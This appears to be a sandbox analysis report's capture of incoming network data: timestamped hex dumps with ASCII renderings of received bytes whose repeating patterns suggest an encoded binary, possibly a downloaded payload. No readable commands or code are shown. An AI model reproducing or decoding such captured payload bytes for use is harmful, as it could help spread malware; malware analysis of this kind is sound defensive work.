                                2022-06-26 07:42:48 UTC75INData Raw: da da da 2a 5a 0d 38 c6 57 30 64 b0 64 fd de 81 53 27 64 17 0d fa da da da 2a 5a 15 38 c6 41 66 de 5e 9e 29 0d 42 33 25 25 2a 5a ce c6 e8 66 de 5e 9e 29 0d 45 e2 25 25 2a 5a ce 3a 83 36 9e b5 5e 18 3d e5 1c 25 25 99 e2 da f0 3d e5 1c 25 9e d5 35 0d 60 03 da da 9e 2e 7b 32 30 64 9e 64 fb 0c e5 af 1c dc 68 a1 2d 2f 66 4a 21 0c e5 66 2a 1d 2c 66 2a 29 04 9c a3 e6 64 e7 dc 15 dc ff 0d 1d 03 da da 66 22 29 66 f2 66 37 af 2f a5 d4 2f 99 0c a5 d4 e6 99 18 a5 d4 31 99 24 a5 d4 e8 99 30 a5 d4 33 99 95 a5 d4 ea ea a9 a5 25 25 25 a5 d4 ec ea a9 ad 25 25 25 d5 27 38 3a 83 36 c4 f4 03 da da 66 39 55 dc fd 0d 5e ce da da dd 29 25 25 25 c6 58 66 39 55 dc fd 0d 03 d4 da da dd 29 25 25 25 c6 91 68 39 55 dc fd 0d 2c da da da dd 35 25 25 25 c6 36 0c a4 af 6f dc da 99 ec 27
                                Data Ascii: *Z8W0ddS'd*Z8Af^)B3%%*Zf^)E%%*Z:6^=%%=%5`.{20ddh-/fJ!f*,f*)df")ff7//1$03%%%%%%'8:6f9U^)%%%Xf9U)%%%h9U,5%%%6o'
                                2022-06-26 07:42:48 UTC76INData Raw: 66 3d 60 b6 5a f6 60 b6 58 e2 d5 29 0d 97 b4 da da 66 20 21 66 30 1d 0d 9a da da da c4 3e dc 25 25 0e da 5e 58 0d 25 99 e8 5e 48 0d 29 66 20 0d 66 5d 5e 48 0d 29 66 20 1d ea db 65 dc dc 20 1d 66 20 1d 66 95 27 66 75 2b 60 f7 99 e2 66 27 64 20 1d c6 e0 0e e5 64 20 1d 66 9e d2 13 64 20 11 66 20 11 74 d2 d6 16 15 99 e2 d5 29 0d 37 b4 da da 5e 20 11 2d 5e 58 0d 25 99 2d 66 20 0d 5e 5d dc 50 61 66 20 0d 64 20 09 16 d6 a3 fa 5e 58 1d 25 99 f4 66 20 0d 5e e5 2d 66 ae ea 8a fb de e7 66 aa 06 a6 66 30 1d 0d 02 da da da 68 20 09 66 30 11 0d ed b2 da da 66 20 09 64 20 0d c6 3e 66 20 0d da 2d 66 20 11 0d 3e b2 da da 64 20 0d 64 58 15 16 38 15 58 de 64 38 15 5e 58 1d 25 99 51 66 30 15 ea 8a fb 66 20 0d 5e e5 2d 0e a4 0d 65 01 da da 66 20 15 75 66 30 21 66 37 66 20 0d
                                Data Ascii: f=`Z`X)f !f0>%%^X%^H)f f]^H)f e f f'fu+`f'd d fd f t)7^ -^X%-f ^]Paf d ^X%f ^-fff0h f0f d >f -f >d dX8Xd8^X%Qf0f ^-ef uf0!f7f
                                2022-06-26 07:42:48 UTC78INData Raw: 0d e0 25 25 25 68 60 ba 23 da da df e0 dc 25 25 0d 5c d8 da da 68 20 0d 75 68 20 13 75 8f 25 8f 25 68 60 ba 23 da da 75 66 20 1d 75 0d 04 96 da da 60 e5 99 47 68 20 0d 75 68 20 13 75 8f 25 8f 25 8d f1 7d 65 25 66 20 1d 75 0d e6 96 da da 60 e5 99 29 eb 20 13 25 eb 20 17 25 0e e5 7f 34 34 89 64 35 8d 32 32 65 25 66 20 1d 75 0d b4 df da da 9e c4 0a 07 da da c6 ca 8d e0 dc 25 25 66 20 21 75 68 60 ba 23 da da 75 0d c9 df da da 8f e0 68 20 ce 75 8f de 0d 5a df da da 75 0d 2c df da da 0e b6 a5 98 ba 23 da da 25 ea a9 d4 25 25 25 a5 58 ce 25 50 2f a5 58 13 25 ea a9 c4 25 25 25 68 60 ba 23 da da 75 0d 93 df da da 68 70 ba 23 da da de e7 64 20 09 c6 de da 28 09 66 20 09 a5 5d 53 99 e6 68 60 ba 23 da da 16 20 09 50 0f 68 60 ba 23 da da 16 20 09 ea a9 86 25 25 25 da
                                Data Ascii: %%%h`#%%\h uh u%%h`#uf u`Gh uh u%%}e%f u`) % %44d522e%f u%%f !uh`#uh uZu,#%%%%X%P/X%%%%h`#uhp#d (f ]Sh`# Ph`# %%%
                                2022-06-26 07:42:48 UTC79INData Raw: 5e e9 15 2e 7b 64 28 19 64 30 1d 64 20 21 5e 58 19 25 50 2f 0e e5 64 20 15 c4 e4 dc 25 25 a2 20 15 da da da da 0e e5 0e 1b 5e 58 21 25 ea a9 84 25 25 25 c4 a7 25 25 25 66 30 19 0e a4 af 31 57 6b 1b 9c a5 99 91 16 50 2d ea 5e fd 25 25 25 5e bc 1a 1b 9c 45 99 53 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 96 25 25 25 16 50 2d ea 5e d7 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b e6 ac 66 ef 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 68 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b 8b e6 ac 66 28 21 8b 64 39 1c c6 e2 66 30 21 8b 64 31 67 65 16 50 2d 4e e4 16 20 1d ea a7 95 da da da 16 20 1d 97 29 66 20 1d 6d 66 30 21 8b a2 29 67 25 25 c6 22 16 50 2d 4e 67 66 30 19 af 39 57 6b 1b e7 a5 99 55 16 50 2d 4e 10 a5 07 1a 1b e7 45 99 39 66 30 19 af 39
                                Data Ascii: ^.{d(d0d !^X%P/d %% ^X!%%%%%%%f01WkP-^%%%^ESf09Wkf`%%%P-^%%%\%%%+ff09Wkf`h%%%\%%%+f(!d9f0!d1geP-N )f mf0!)g%%"P-Ngf09WkUP-NE9f09
                                2022-06-26 07:42:48 UTC80INData Raw: 7c c1 e5 1c 25 75 0d 68 da da da 7f 36 9e 66 e5 dd 31 25 25 25 60 e5 99 fa 0d 87 da da da 7e c1 e5 1c 25 0d bd da da da 7c c1 e5 1c 25 75 0d 38 da da da 7e 99 0b 1c 25 9e 68 65 25 2c dd 31 25 25 25 60 e5 99 4b 5e 18 c1 e5 1c 25 da 99 f8 7c c1 e5 1c 25 75 0d 5b da da da 64 29 49 5e 61 49 25 99 e4 66 29 49 75 0d 31 da da da 7f 9e 66 e5 dd 31 25 25 25 60 e5 99 f4 0d e3 da da da 5e 18 c1 e5 1c 25 da 99 e6 7c c1 e5 1c 25 75 0d 1b 23 da da 9e b5 af e8 89 0b 1c 25 7c c1 e5 1c 25 a9 a4 50 4b 89 66 f0 51 25 25 25 66 29 a7 9e 0d e8 da da da 7c c1 e5 1c 25 75 0d f7 23 da da 60 e5 99 dc 9e 7c 99 0b 1c 25 9e 75 0d 9c 23 da da 60 e5 99 b6 9e dd c5 e5 1c 25 0d 9b d2 da da 9e b5 df c5 e5 1c 25 5e 58 31 dc 50 4f 75 77 eb e0 89 0b 1c 25 dc 66 28 2d 64 e8 8d 0b 1c 25 64 6f
                                Data Ascii: |%uh6f1%%%`~%|%u8~%he%,1%%%`K^%|%u[d)I^aI%f)Iu1f1%%%`^%|%u#%|%PKfQ%%%f)|%u#`|%u#`%%^X1POuw%f(-d%do
                                2022-06-26 07:42:48 UTC82INData Raw: 1d 64 20 21 66 28 1d 1c 66 20 21 66 f0 25 35 65 25 0d 88 09 da da 66 20 19 0d ac b8 da da 0e e5 30 8d 9f 42 65 25 89 da 55 89 64 45 eb 20 ce 25 66 50 1d 6b 73 60 1b a1 55 6b 0e da 66 38 21 66 20 19 0d dd b8 da da 75 66 de 0d d5 b8 da da 75 0d 67 23 da da 60 e5 50 e4 66 20 2d 64 5d eb 20 ce dc 22 5e 9e 29 73 50 fb 0e e5 7f 34 34 89 64 35 8d 5c 42 65 25 68 20 19 0d 9c fd da da 66 20 21 66 28 1d 1c 66 f0 25 35 65 25 0d ce 07 da da 9e c4 e0 f7 da da c6 03 af 20 ce 66 58 09 66 50 0d 66 38 11 66 c0 38 e7 29 25 b5 0e f7 84 25 25 25 29 99 2b 5c ef 25 27 25 25 84 25 25 25 45 99 08 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 65 c6 1c 5e ef 45 c6 61 84 25 25 25 a5 99 2d 5c ef a5 25 25 25 c6 08 5e ef 35 66 e7 9e 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 29
                                Data Ascii: d !f(f !f%5e%f 0Be%UdE %fPks`Ukf8!f ufug#`Pf -d] "^)sP44d5\Be%h f !f(f%5e% fXfPf8f8)%%%%)+\%'%%%%%E%%%e%%%^e^Ea%%%-\%%%^5f%%%e%%%^)
                                2022-06-26 07:42:48 UTC83INData Raw: 35 8d 83 91 65 25 68 20 19 66 f0 41 8b 65 25 0d ef b8 da da 9e c4 4d a8 da da c6 0f 66 20 05 3a 83 36 66 c0 38 9e 30 66 11 0e e5 30 8d 68 91 65 25 89 da 55 89 64 45 da e0 a5 0b 1c 25 0e e5 7f 34 34 89 64 35 8d b9 91 65 25 9e c4 17 f1 da da c6 1d 38 9e 66 e5 5e 08 a5 0b 1c 25 dc 9e 8d 0b 1c 25 15 da 25 25 8d 0b 1c 25 cc da 25 25 8d 0b 1c 25 17 da 25 25 8d 0b 1c 25 ce da 25 25 8d 0b 1c 25 19 da 25 25 8d 0b 1c 25 d0 da 25 25 8d 0b 1c 25 1b da 25 25 8d 0b 1c 25 d2 da 25 25 8d 0b 1c 25 1d da 25 25 8d 0b 1c 25 d4 da 25 25 8d 0b 1c 25 1f da 25 25 8d 0b 1c 25 d6 da 25 25 8d 0b 1c 25 21 da 25 25 8d 0b 1c 25 d8 da 25 25 8d 0b 1c 25 23 da 25 25 8d 0b 1c 25 da da 25 25 8d 0b 1c 25 05 da 25 25 8d 0b 1c 25 bc da 25 25 8d 0b 1c 25 07 da 25 25 8d 0b 1c 25 be da 25 25 8d
                                Data Ascii: 5e%h fAe%Mf :6f80f0he%UdE%44d5e%8f^%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%!%%%%%%#%%%%%%%%%%%%%%%%%
                                2022-06-26 07:42:48 UTC84INData Raw: 25 25 25 25 25 f1 4c 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 37 20 20 9d 99 40 97 93 3c 91 20 9d 3e 40 95 99 44 4a 93 b5 51 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 51 97 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 24 93 99 20 97 97 4a 97 66 e5 a9 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 a9 97 65 25 35 25 25 25 05 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 2f 20 69 44 9b 67 54 7f 40 97 4a b5 01 97 65 25 25 25 25 25 25 25
                                Data Ascii: %%%%%Le%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye%7 @< >@DJQe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Qe%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% $ Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%5%%%Le%[e%[e%[e%[e%[e%YYe%uYe%Ye%/ iDgT@Je%%%%%%%
                                2022-06-26 07:42:48 UTC86INData Raw: d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 33 20 2e 99 3c 3e 46 2a 9b 40 97 8b 91 4a 52 b5 95 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 95 52 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 1e 4a 93 99 97 4a 91 1e 66 e5 ed 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 ed 52 65 25 31 25 25 25 d5 4a 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e8 20 7b 3c 97 44 3c 93 99 20 97 97 4a 97 66 e5 49 9d 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: [e%[e%[e%[e%[e%YYe%uYe%Ye%3 .<>F*@JRRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% JJfRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%1%%%Je%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D< JfIe%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:42:48 UTC87INData Raw: 32 2e 64 eb 64 b2 e4 e5 99 de 66 65 21 e4 f7 99 de 66 77 21 64 9c 14 ac 9b 27 64 ac 14 a4 ce cb 99 4f af 83 da a5 d6 3c 97 2d a5 d6 9f 52 de a5 c6 45 af 5a da a5 da 3c 97 2d a5 da 9f 52 de a5 ca 45 5d d6 99 fd ea db 9e ea db b2 04 f5 36 3a 83 9e b5 14 f5 99 f4 e4 e5 99 f2 e4 f7 99 39 66 6d 21 16 6f 21 50 31 0d 6e da da da 60 e5 50 de d5 dc 9e 0c e5 9e b5 2e 7b 66 17 66 fd 66 eb 0d f2 eb da da 75 66 eb 0d ea ed da da 75 66 9e 0d e2 eb da da 75 66 9e 0d da a2 da da 75 8f 25 8d 25 29 25 25 0d 87 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 eb 0d ba a0 da da 75 66 eb 0d b2 a2 da da 75 66 9e 0d aa a0 da da 75 66 9e 0d a2 a2 da da 75 8f dc 8d 25 29 25 25 0d 4f 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 fb 66 9e 0d 94 da da da 60 e5 ea b9 e5 83 36 9e b5
                                Data Ascii: 2.ddfe!fw!d'dO<-REZ<-RE]6:9fm!o!P1n`P.{fffufufufu%%)%%^'6.{fffufufufu%)%%O^'6.{ffff`6
                                2022-06-26 07:42:48 UTC88INData Raw: 9c 1c 25 75 66 29 90 6d 9c 1c 25 75 66 a2 0d 0a 9e da da 75 0d 94 bc da da 3a 83 36 9e b5 2e 66 fd 8f 25 8d a5 25 25 25 8f 27 8f 25 8f 25 8d 25 25 25 e5 66 9e 0d 2d 9e da da 75 0d b7 bc da da 36 9e 0d b2 da da da 9e 66 e5 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d a2 07 da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d fe be da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 30 66 11 5e e9 1d 2e 7b 66 17 66 fd 66 20 2d 64 20 1d 66 20 31 64 20 21 7b 68 20 21 75 66 20 1d 75 2e 0d 74 07 da da 64 20 1d 66 20 1d 66 30 21 83 36 34 34 38 e7 2d 25 75 0d ef 05 da da 9e b5 30 66 11 5c e9 d9 23 da da 2e 66 fd 68 60 d9 23 da da 75 66 9e 0d 6b e7 da da 75 0d 4d
                                Data Ascii: %uf)m%ufu:6.f%%%%'%%%%%f-u6f.{2,fff%hiI)u2{.`P)If)I:6.{2,fff%hiI)u2{.`P)If)I:60f^.{fff -d f 1d !{h !uf u.td f f0!6448-%u0f\#.fh`#ufkuM
                                2022-06-26 07:42:48 UTC90INData Raw: 0c e5 64 20 21 de 28 35 64 58 1d 0c e5 64 20 19 64 20 15 64 20 11 e4 f7 99 e8 14 f3 99 e4 d1 61 00 99 33 cf 6f 50 ce 64 1d 06 20 1d c4 fe de 25 25 14 f3 99 17 d1 61 00 99 c4 68 83 23 64 38 0d ad 20 c2 61 08 50 e0 14 f3 99 01 d1 0d a3 25 25 25 61 5f 50 2f 64 38 19 14 f3 99 a6 d1 c6 bc 64 38 05 96 da da da da 61 53 50 2f 14 f3 99 dd d1 0d 7f 25 25 25 64 38 01 64 50 fd 2c 77 0d 70 25 25 25 7f 66 38 05 04 a6 4e 27 0c b6 a5 58 c2 08 50 2f 04 ef 4e 29 dc ac 0c f7 ce c9 62 b4 04 ef 4e 29 dc ac 0c f7 d5 45 ce cf 62 b4 04 ef 4e 29 dc ac 0c f7 ce c9 5e 58 15 25 99 2f 77 68 20 15 0d 41 da da da 7f 34 66 50 fd c4 22 da da da 0c b6 61 4f 99 47 61 55 97 18 61 14 52 14 44 b6 2f 25 25 25 51 55 ea db e5 dc 9e 14 f3 99 de d1 c6 09 7d c4 55 da da da 66 20 19 16 20 2d 5a 37
                                Data Ascii: d !(5dXd d d a3oPd %%ah#d8 aP%%%a_P/d8d8aSP/%%%d8dP,wp%%%f8N'XP/N)bN)EbN)^X%/wh A4fP"aOGaUaRD/%%%QU}Uf -Z7
                                2022-06-26 07:42:48 UTC91INData Raw: 25 ad 20 17 a2 20 11 25 25 25 25 dd ee 25 25 25 a5 d4 25 50 f2 66 20 31 5e 1d 27 58 e0 dd 27 25 25 25 5e 1d 37 a3 e0 dd 37 25 25 25 64 20 31 75 dd ea 02 25 25 a5 58 35 27 97 de 66 20 2d 75 68 20 f9 0d 38 27 25 25 66 58 21 ea 92 20 f9 08 da 5a 25 25 5e 1d 27 4e 3f 64 9c 0d 95 25 25 25 68 d9 24 e5 b1 65 25 de 50 11 94 de 25 25 25 ce c9 c6 08 68 50 b2 ea db 38 35 a5 d6 dc 99 35 a5 d6 29 52 e4 ea 9a 20 f9 16 20 31 a3 27 8e 25 68 41 78 d1 b1 65 25 de 38 11 66 f6 de 38 11 da ae 64 1d 06 20 21 36 83 3a c4 cc dc 25 25 b4 b1 65 25 10 68 65 25 91 68 65 25 91 68 65 25 fb 68 65 25 24 73 6b 73 1c 73 d1 2d e5 50 de d5 55 73 9e a5 58 fb 25 99 de d5 08 cf 9e 0d cc da da da ea 9a 28 f9 0c f7 16 28 31 5a f8 5e d4 d8 a1 3d e4 a4 5a 3f d5 55 cf a5 63 25 99 5f af 20 d6 cf d2
                                Data Ascii: % %%%%%%%%Pf 1^'X'%%%^77%%%d 1u%%X5'f -uh 8'%%fX! Z%%^'N?d%%%h$e%P%%%hP855)R 1'%hAxe%8f8d !6:%%e%he%he%he%he%$skss-PUsX%((1Z^=Z?Uc%_
                                2022-06-26 07:42:48 UTC92INData Raw: da 36 a5 da 08 50 27 b4 05 a5 d6 25 99 29 ba 1a c6 27 b6 1a 76 ba 05 8b 84 e4 25 50 2b d5 dc c6 29 b8 fd 0c e5 76 b6 07 b4 48 1d 76 c6 7b d1 2d e5 99 29 61 45 99 d2 73 9e 0c e5 0c f7 d1 51 5f 29 2f 4e ea ff e8 a1 9c 1c 25 64 20 19 ff 20 19 67 c6 0f 73 9e 0c e5 0c f7 af 33 a5 d4 06 99 e0 a5 d4 08 50 dc 6b af 2b 51 5f 29 2f 4e 33 6b 46 f7 2f dc e7 5c 1f 19 dc 25 25 97 0f a5 d4 08 50 27 d2 ff 9e 36 83 3a 66 c0 38 9e 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f ea 8f 25 68 30 2d 68 20 e5 0e a4 0d f5 d4 da da 66 ed 68 30 e5 66 9e 0d 31 8a da da 36 66 c0 38 e7 31 25 b5 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f 25 8f 25 68 30 2d 68 20 e5 8c dc 0d c5 d4 da da 66 ed 68 30 e5 66 9e 0d 01 d3 da da 36 66 c0 38 e7 2d 25 b5 2e 7b 66 17 66 fd 66 9e 0d 72 d7 da da 66 fb 0e a4 0d 9b 23
                                Data Ascii: 6P'%)'v%P+)vHv{-)aEsQ_)/N%d gs3Pk+Q_)/N3kF/\%%P'6:f80f^.f%%h0-h fh0f16f81%0f^.f%%%h0-h fh0f6f8-%.{fffrf#
                                2022-06-26 07:42:48 UTC93INData Raw: 66 ff 60 b6 99 3f 66 30 2d 66 b7 21 23 da da 66 28 2d 68 b9 ec 25 da da da 66 a6 0d fb b9 da da 66 20 2d dc bd 21 23 da da 36 38 9e 66 e5 30 66 11 2e 66 fd 66 20 2d 75 66 9e 0d d2 86 da da 66 f5 66 9e 0d c7 da da da 34 36 38 9e 66 e5 30 66 11 5e e9 05 2e 7b 66 17 66 fd 66 20 2d 75 8f 29 64 50 05 eb 20 09 25 64 38 0d eb 20 11 25 68 20 05 75 8f dc 94 b1 9c 1c 25 68 20 15 df 35 25 25 25 0d d9 ca da da 66 f5 68 20 15 0d 7f da da da 34 83 36 66 c0 38 9e 68 65 25 30 66 11 2c 66 20 2d 5e e5 21 66 35 64 30 21 c6 27 da 25 66 35 af 37 66 28 2d 5f 2c d6 99 17 66 25 06 20 21 65 66 30 2d 64 67 19 34 38 9e 66 e5 30 66 11 66 20 2d a5 9d c8 25 50 4f 66 20 2d 66 65 2d da 95 31 da 95 2d 66 20 2d 68 6d 13 66 20 2d 68 75 15 66 20 2d 5e e5 17 0d 70 23 da da 66 20 2d eb 65 c8
                                Data Ascii: f`?f0-f!#f(-h%ff -!#68f0f.ff -ufff468f0f^.{fff -u)dP %d8 %h u%h 5%%%fh 46f8he%0f,f -^!f5d0!'%f57f(-_,f% !ef0-dg48f0ff -%POf -fe-1-f -hmf -huf -^p#f -e
                                2022-06-26 07:42:48 UTC95INData Raw: 25 0d ca 1f da da 34 c4 ed e0 25 25 30 0d 0a d6 da da 34 30 0d 7d d6 da da 34 66 20 2d 75 30 68 30 fd 66 20 19 0d 9a d6 da da 34 66 20 fd 0d c7 1f da da 34 c4 76 e0 25 25 30 0d 27 d6 da da 34 30 0d 06 d6 da da 34 66 20 2d 75 30 68 30 f9 66 20 19 0d 23 21 da da 34 66 20 f9 0d 50 1f da da 34 c4 93 e0 25 25 30 0d b0 1f da da 34 30 0d 23 1f da da 34 66 20 19 6d 5e 0d 27 97 29 99 3d c6 55 66 20 2d 75 ea 92 20 15 66 30 19 0d 89 1f da da 34 c4 18 e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 d1 0b 1c 25 0d 4f 1f da da 34 c4 fe e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 01 0b 1c 25 0d 35 1f da da 34 c4 e4 e0 25 25 30 0d 95 1f da da 34 66 20 19 6d 5e 0d 27 97 2f 99 00 6d 99 24 6d 99 48 c6 5a 30 0d ab 1f da da 34 66 20 2d 75 ea 92 20 13 66 30 19 0d d4 d4 da da 34 c4 f7
                                Data Ascii: %4%%040}4f -u0h0f 4f 4v%%0'404f -u0h0f #!4f P4%%040#4f m^')=Uf -u f04%%f -u f)`%O4%%f -u f)`%54%%04f m^'/m$mHZ04f -u f04
                                2022-06-26 07:42:48 UTC96INData Raw: 66 20 2d 75 dd c1 0b 1c 25 df dc 25 25 25 0d 00 d0 da da 34 c6 40 66 2b 64 20 01 c6 fa 66 2b af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e e6 66 2b 0d 6b f8 25 25 64 2b c6 27 da 2b 66 2b a5 5d 25 99 e4 66 2b af 25 5f 20 d6 50 ac 66 20 2d 75 66 3b 06 30 01 66 20 01 0d b6 19 da da 34 66 2b a5 5d 25 99 3b da 2b c6 37 66 20 2d 75 68 20 d6 df dc 25 25 25 0d e3 19 da da 34 66 2b a5 5d 25 ea 60 ff 1d da da 66 20 2d da ad 1d 23 da da 0e e5 7f 34 34 89 64 35 8d f0 c7 65 25 68 20 f9 df 27 25 25 25 0d 1a c3 da da 9e c4 4c 72 da da c6 c6 3a 83 36 66 c0 38 9e 1c 28 0a 75 28 25 25 25 1c 0a 75 25 1c 28 75 28 25 25 25 25 1c 1c 1c 1c 25 25 25 25 1c 1c 1c 25 45 25 25 25 30 66 11 5c e9 1d 23 da da 2e 7b 66 ff 66 15 0e e5 64 60 21 23 da da 0e e5 64 60 1d 23 da da 60 b6 99 e6
                                Data Ascii: f -u%%%%4@f+d f+%%%%~=%Nf+k%%d+'+f+]%f+%_ Pf -uf;0f 4f+]%;+7f -uh %%%4f+]%`f -#44d5e%h '%%%Lr:6f8(u(%%%u%(u(%%%%%%%%%E%%%0f\#.{ffd`!#d`#`
                                2022-06-26 07:42:48 UTC97INData Raw: 13 8b 66 20 17 8b 64 20 11 c6 5b 8b 66 58 15 af 20 c4 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 19 8b 64 20 11 c6 3f 8b 66 58 19 af 20 c6 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 15 8b 64 20 11 5e 58 21 25 a3 33 30 ea 92 a2 0d e2 23 da da 34 66 1d c6 95 a5 58 0d 27 52 8f 0d 46 ca da da ea 92 ed ea 92 e0 09 e5 1c 25 06 ed 66 9c 2c 94 89 25 25 25 74 d2 d4 34 8b 46 e5 89 8b de 1d 8b 5e 18 09 e5 1c 25 25 9b 61 ea 92 a2 16 ed a3 10 8b 5e a2 89 c6 0a 0d 55 ca da da 66 1d a5 58 1b dc 50 37 8b 66 20 19 8b 64 20 11 8b 66 20 17 8b 64 20 13 c6 35 8b 66 20 19 8b 64 20 13 8b 66 20 17 8b 64 20 11 66 ae af e8 6c 0b 1c 25 66 eb 0d 3e 21 da da 66 ae 66 eb 0d 3b d6 da da a5 18 79 c2 1c 25 25 ea a9 8e 25 25 25 66 f0 b9 0b 1c 25 dd d5 cd 65 25 0d f4 c3 da da 60 e5 ea a9 76
                                Data Ascii: f d [fX f d f d ?fX f d f d ^X!%30#4fX'RF%f,%%%t4F^%%a^UfXP7f d f d 5f d f d fl%f>!ff;y%%%%%f%e%`v
                                2022-06-26 07:42:48 UTC99INData Raw: da da 66 9e 0d d4 b9 da da c6 e4 66 9e 66 fb 0d 77 b9 da da 83 36 66 c0 38 e7 29 25 66 e5 2e 7b 32 2c 66 b4 66 17 66 1d 8f 27 68 69 49 29 75 7b 32 0d 29 dd da da 60 e5 a3 e0 af 29 49 c6 27 66 9e 7f 3a 83 36 9e 30 66 11 2c 2e 7b 32 64 28 21 66 1f 66 15 66 38 2d 2e 66 20 35 66 65 21 0e a4 66 fb 0d 46 da da da 5e 16 25 50 e8 66 20 21 66 29 dd 66 ae 0d 58 d7 da da 3a 83 36 34 38 e7 2d 25 b5 30 66 11 0e a4 2c 2c 2c 2c 2c 2c 2e 7b 32 0e e5 30 8d 86 88 65 25 89 da 55 89 64 45 0d a2 92 da da 64 20 21 96 dc 25 25 25 e3 d5 0b 1c 25 9a 05 0b 1c 25 30 8f e6 68 20 19 75 94 b5 9c 1c 25 66 ae 6f 68 1e 69 6d 0d 54 da da da 34 66 30 19 66 eb 0d b3 6e da da 30 8f e6 68 20 15 75 94 e5 9c 1c 25 66 ae 6f 68 1e 5d 6d 0d 7b da da da 34 66 30 15 66 a2 0d 46 6e da da 1e 5e a2 29
                                Data Ascii: fffw6f8)%f.{2,fff'hiI)u{2)`)I'f:60f,.{2d(!fff8-.f 5fe!fF^%Pf !f)fX:648-%0f,,,,,,.{20e%UdEd !%%%%%0h u%fohimT4f0fn0h u%foh]m{4f0fFn^)
                                2022-06-26 07:42:48 UTC100INData Raw: 7b 0d a6 8e da da 5c 98 01 21 da da 25 35 25 25 50 41 8d e0 dc 25 25 68 60 0f d8 da da 75 66 60 f5 21 da da 75 0d 9a d7 da da 60 e5 50 fe 8d e0 dc 25 25 68 60 0f d8 da da 75 7c 8d 0b 1c 25 75 0d c9 d7 da da 66 eb 0d 68 da da da 64 20 19 c6 e4 06 90 f5 21 da da 64 50 19 68 60 0f d8 da da d7 81 0d b7 33 25 25 66 f5 67 68 60 ca 23 da da 94 29 dc 25 25 0d 22 ae da da dd 09 d7 65 25 64 20 21 dd 09 d7 65 25 64 20 1d 66 9e 66 f0 d5 4a 65 25 0d 53 a9 da da a9 e5 99 04 66 1e 29 0d fb b7 da da 64 20 21 66 20 21 0d c6 f7 da da 60 e5 99 37 66 30 21 a5 a1 27 da 53 99 2d dd 0d d7 65 25 64 20 1d 8d 25 dc 25 25 68 60 0f 21 da da 75 7c 5d f5 1c 25 66 65 29 75 7c 8d 0b 1c 25 0d d3 7c da da 75 0d 75 8e da da 68 70 c9 d6 da da 66 de 0d 8a 5c da da 68 60 c9 d6 da da 64 60 c9
                                Data Ascii: {\!%5%%PA%%h`uf`!u`P%%h`u|%ufhd !dPh`3%%fgh`#)%%"e%d !e%d ffJe%Sf)d !f !`7f0!'S-e%d %%%h`!u|]%fe)u|%|uuhpf\h`d`
